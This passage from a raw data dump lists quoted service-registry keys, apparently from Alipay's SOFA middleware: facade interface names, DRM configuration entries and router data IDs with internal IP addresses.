ranscore.common.service.facade.trans.FinTransRepayQueryFacade:1.0:fundtranscore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mobilegeocoding:name=com.alipay.mobilegeocoding.core.service.drm.DistrictVersionResource.cityTownJsonStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mrchasset.common.service.facade.qc.AssetQcStandardFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openhome.facade.admin.TinyAppLimitConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.cardcenter.facade.VerifierFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:mrchiscore_adjustConfirmWaitProcessCallBack@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.settlecore.service.facade.QueryWithDraw:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sdaconfigsvr.common.service.facade.api.KeyManageServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_IFXQUOTE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cloudprovision.facade.ContainerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kmi.common.service.facade.KeyQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_M_CFIN_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_30.50.50.99#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.secuinfos.biz.news.shared.publisher.MsgPublisherService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.125.156#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.instpay.settleprod.service.facade.gcard.GCardFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.ck:name=com.alipay.zdal.config.groupCluster.charge_gpfeeMysqlReadDataSource.ck,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mrchportalcore.common.service.clerktone.facade.api.attendance.ClerkAttendanceQueryGzoneFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.supergw.service.facade.transaction.MessageAssembleService:1.0:supergw.tangyuan.alipay.net@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbsales.common.service.facade.bcm.BPProcessCallbackFacade:1.0:salesLeadsTaskPostExcutor@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchmobile.common.service.facade.reachshop.AmapInfoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fppolicy.service.standard.DataDevelopServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.filebridge.service.facade.FBridgeManagementService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.nodejs.ConsumerService:1.0:oneapitwa@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.recruitcore.facade.api.search.RecruitDataDumpFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.credit.api.triple.CreditUserInfoService:1.0@tri#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbasecore.service.v2.stream.facade.ClusterSentenceService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antinvoice.common.service.facade.api.EinvTitleQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.51.236#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.publichome.common.service.facade.life.BusinessTaskManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitydata.common.service.facade.velocity.OpenVelocityService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.inscvprod.common.service.facade.InsPetPicRecognizeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.138.50#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.antmember.biz.rpc.invite.h5.InviteRecommendFriendFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paycore.service.payment.asset.AssetFluxService:1.0:minitrans@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.167.117.138#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mobilelbs.common.service.facade.weather.LatestWeatherServiceInRzone:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.hyp.common.service.facade.cfgriskctrl.AppRuleConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openhome.facade.admin.ChannelMngFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.rdf.log.conf.BizMonLogConfCtrlDrm.maxJvmCacheCapacity,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.DynamicConfigTBaseCache.shardingRule,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.iopencore.common.service.manager.CommunicationPointDTOManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_P_BLACKLIST#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mobilelink.client.SpannerZoneRouterClient:1.0:mobilechat@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promocore.common.manager.facade.CampCopyQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.securitycap:name=com.alipay.dwebupload.client.drm.DomainConfig.djWarmUpDomain,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.appxprod.common.service.facade.api.apply.ApplyInfoConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finvirtualta.core.service.yeb.manager.YebTradeOrderManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY_V2@zpdcore#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.alipay.fundmng.biz.shared.instwithdraw.service.InstWithdrawOrderService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.nodejs.ConsumerService:1.0:insxhbbff@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.rassistcenter.common.service.facade.ToolExecRecordQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.arcore.common.service.facade.ArOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.179.94#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.finsnsbff:name=com.alipay.routeclient.DefaultRouteCoordinator.elasticRuleVersion,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofaops.configmanager.CheckNewFile#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.mybank.bkinvestcore.common.service.facade.fund.FundGroupQuotationService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbdish.common.service.facade.api.KbdishCookQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.rulecenter.facade.common.PublishRuleService:1.0:rulepub@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.huanyu.facade.change.ChangeBatchExecService:1.0:bkopsctrl_changeBatchExecService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mapi.facade.exterface.ExterfaceFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.iexclienttrdcenter.service.facade.gui.EcIsolationTableMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.platform.schedule.concurrent.execute.Executer:1.0:giftSettleTaskExecuter$1@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.treasurebag.rule.service.NameListService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.qianli.common.service.neardata.facade.QianliSendMsgFacade:1.0:mobileha@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promobench.common.service.facade.service.usermenu.UserMenuRelationService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchprod.common.service.facade.merchant.MrchProdMerchantRelationQueryMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.msecuritycore.api.SecurityValidatePolicyRzoneService:1.0:securitycore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csaccurate.service.facade.mng.api.RuleSetService:1.0:csaccurate@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bkprodmng_prodAdjustCallBack@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.quickrun.common.service.api.TaskRunningFacade:1.0:girisk@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:imobilemng@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zerox.common.service.facade.measure.MeasureAccessService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.antgroup.zmxy.zmcie.common.service.facade.CreditLimitReadFacade:1.0:antcie@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.openeval.common.service.facade.activityha.ActivityAppFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.mobilepep.spi.service.MobilePEPService:1.0:csactive@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.achelmetcore.common.service.facade.SecurityPolicyRdsFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_11.167.126.53#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.ioteds.metadata.model.api.EntityMetadataInnerService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilelbs.common.service.facade.BizAreaService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.minicore.common.service.facade.appdeploy.api.DeployPackageQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_BAITIAOPROD#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.ebppgw.facade.KeyManagerFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.52.179.226#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.inscommunity.common.service.facade.TagGroupFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:anteye@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.admgr.common.service.facade.PrincipalConfigServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bizrecon.facade.NettingRefundFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kgcore.common.service.facade.schema.PropertyService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.promox.facade.crowd.CrowdFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.insmarketingprod.common.service.facade.mng.campaign.InsMktProdPrizeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ismonitor.biz.censor.simplehandler.SimpleHandlerAlertService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cmsmng:name=com.alipay.routeclient.DefaultRouteCoordinator.zoneInfo,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.insautobff:name=com.alipay.sla.businessgray.drm.BusinessGrayGlobalSwitcher.bizOpen,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.clearingcenter:name=com.alipay.sla.disaster.drm.SlaDisasterRuleConfigDrm.exporterConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.insptmarket.facade.module.api.ModuleDataDicInfoManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dmeta.facade.virtual.VirtualDomainModelFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.socialcore.facade.taskcenter.TaskTmpConfigQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.mashup:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.xfireConnectionPerHostInMosn,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.fporgassetcenter.common.service.facade.api.BuyBackMngServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.charge:name=com.alipay.zdal.ldc.tair.revtransTairCache.cacheEngineUrl,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.charge:name=com.alipay.checkroute.common.service.checkersdk.drm.SDKConfigDRM.disableSDKLogs,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.158.106.219#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.pcreditprerec.service.SystemMessageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.certifymng:name=com.alipay.antvip.client.internal.drm.DrmControl.allAvailable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.omoaidbase.common.service.facade.api.AgreementFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditmerchant.service.facade.HbProductFlowMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.fcbuservice.common.service.facade.ProcessCallback:1.0:antbuservice@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.rccenter.common.service.facade.RcHgDecisionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alifi.shared.component.lock.service.LockBSFacade:1.0:bkmerchantprod-lockBSFacade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antforest.common.service.facade.EnergyStatusInfoService:1.0:antforest@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY@csshield#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.alipay.finassetinsight.common.service.facade.api.LabelFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bizrecon.facade.ext.CertificateServiceFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:instfund@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.finpwm.core.repository.FinpwmActivityOrderRepository:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfundprotocol.common.service.facade.SceneTradeAccountLimitFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finauth.common.service.facade.account.service.ExtAccountAbilityQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.rulemng.common.service.facade.template.RuleTemplateService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dcepcoin.common.service.facade.api.SecurityMachineManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.158.120.228#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.lendpofprod:name=com.alipay.lendpofprod.biz.service.loan.impl.support.drm.UcaMigrateOperateDrm.doAccept,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finfiprod.common.service.facade.rfm.asset.service.RfmAssetDetailQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.iamlmng.biz.verify.common.interfaces.VerifyTaskManager:1.0:scanTask@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.160.159.195#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mobilecodec.service.facade.CodeInnerFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_C_FAMILY_POINT_TOPIC#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:mrchprod_labelBatchProcessCallBack@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paycore.service.payment.receipt.api.PayReceiptService:1.0:10@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ebppcore.facade.confmng.SubBizTypeMngFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.tairmanager.interfaces.endpoint.facade.rest.tair.ClusterTairNameFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.inscommunity.common.service.facade.ManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Notify_SubscriptionInfo_BindingTP_F_CONTROL#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.finfocore:name=com.alipay.finfocore.common.service.facade.drm.DrmContentLdcManger.rzoneUids,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.argo.spi.publish.CustomDeployFacade:1.0:ins.cs.policy.surrender@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.lendpofprod.common.service.facade.loanapi.apply.LoanApplyQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ebillcenter.common.service.facade.EbillUserProfileFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lendpofprod:name=com.alipay.lendpofprod.biz.shared.common.schedule.thread.commonCmdProcessThreadPool.maxPoolSize,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.edubizsp.common.service.facade.edu.EduStuCertifyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.gfas:name=com.alipay.antvip.client.internal.drm.DrmControl.waitServerListTimeoutMs,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.intimateprod.common.service.facade.spi.IntimateBenefitCallbackService:1.0:mwealthprod_watch_open_account@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.financemng.common.service.integration.zcbsalescenter.AppointmentQueryFacadeClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ngfesync.facade.daas.meta.DbMetaService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_O_BUMNG_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","config:com.alipay.inspectcore.common.service.sdk.bizengine.query.CodeQueryEngine:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.antforest.common.service.facade.BackendOperationLogService:1.0:antforest@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.iotcore.admin.PackApplyAdminApi:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.forexprod.common.service.facade.ForexBillQueryWService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.peerpayprod.common.service.facade.FamilyChatFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finsteward.common.service.facade.label.ProductLabelManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.marslib.domain.crawler.facade.CrawlerFacade:1.0:cnsite@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:intentionservice@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.fintradecenter.biz.trade.interfaces.PaidEventExecutor:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:authcenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insofflineinvest.common.service.facade.service.OneConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.custdecision.service.merchantdata.facade.MobilecashierErrorCodeStatFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.103.76.180#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","config:com.alipay.mrchpromoprod.facade.activity.VoucherInfoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","config:com.alipay.mrchportalcore.common.service.facade.relationship.MrchGroupReadFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.mfinquotationprod.common.service.facade.api.QuotationPlateRankingFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.riskmngPunishcenterTairCache_dest.legacyRwWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.102.210.99#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.permlimit:name=com.alipay.permlimit.nearshare.drm.PermlimitAvailableSwitchConfig.open4Test,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mcomment.service.client.comment.CommentRemoteQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbdish.common.service.facade.api.manage.KbdishGroupQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.charge:name=com.alipay.checkroute.common.service.checkersdk.drm.SDKConfigDRM.checkerQueryTimeOut,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofa.rpc.elastic.ElasticService:1.0:devconf@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finstore.common.service.facade.fop.mng.RecheckFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfundtrade.common.service.facade.api.FixedPeriodTradeOrderQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileiclib.common.service.facade.product.tel.CallVerifyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finbatch.comm.service.facade.accept.FinBatchSchedulerService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.linkede.fabricsrv.rest.ConfigRestService#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.ordercore.common.service.facade.order.OrderNumGenFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ucdpmng.facade.UcdpGrayFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.securitydata:name=com.alipay.securitydata.common.service.velocity.opssla.VelocityPubConfigResource.fraudmng.${service_mode}.loadSimilarSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.charge:name=com.alipay.xview.core.provider.drm.CacheProviderSwitch.queryDigestLogControlStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.routeclient.interfacename:riskmng#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.mybank.oyz.core.facade.api.ProductBasicFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insxhcprod.common.service.facade.UserIdentityFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.links.common.service.facade.LinksTokenFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.playbackmng.zplayback.release.service.ReleaseInfoService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.koubei.kbcateringorder.common.service.facade.api.morder.DinningFlowFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mfinsnsprod.service.facade.api.ProdTopicInfoFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.fininfo:name=com.alipay.common.tracer.manage.TracerDrm.zdalTairDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.serverlesscore.YamlTestApi19Service:1.0@tri#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.securitydata:name=com.alipay.securitydata.common.service.indicator.drm.IndicatorSnapshotResource.isSysAutoload,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.antflow.common.service.facade.ComponentFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.167.177.8#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.agreementpay.senior.service.facade.api.AgreementPayService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.kbdiscount:name=com.alipay.kbdiscount.common.service.facade.utils.drm.DiscountComparisonSwitchDrm.comparisonSwitchConfigString,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.customscenter:name=com.alipay.antvip.client.internal.drm.DrmControl.printStatInfoIntervalSec,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.koubei.kbindustryomp.common.service.facade.api.record.RecordManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cicadamodel.common.service.facade.api.DomainPublishFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.amsAssistantTBaseCache.refresh,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.antfeaturelib.common.facade.service.DataSourceCalcService:1.0:publicDomain_zmcustcore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfundprod.common.service.facade.FinFundAppointmentQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mdiscountprod.common.service.facade.ticket.api.MerchantTicketUseService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insttrade:name=com.alipay.cif.client.drm.TairToTbaseSwitch.shadowFullAccessToTbase,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.dsoc.service.facade.api.config.center.DeployRecordQueryService:1.0:xiaokang1@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_S_PAY#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.isasp.service.facade.psbp.InsuranceCardFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.revol.core.service.facade.ScriptChecker:1.0:cone_certify_sim@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zdataquery.common.service.facade.datastore.DatastoreQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pkgcore.common.service.facade.GrayRuleQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.cif.client.drm.LevelTwoCacheSwitcher.blockingQueueSize,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.inscommunity.common.service.facade.UserRolePermissionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.yebplus.common.facade.service.api.yebscene.YebcTaskFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.253.238#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.riskmng.common.service.facade.api.UserCertifyServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipayplus.mobilesrc.facade.PluginInfoService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.datariskmarket.facade.RmEngineDataService:1.0@DEFAULT#@#DEFAULT_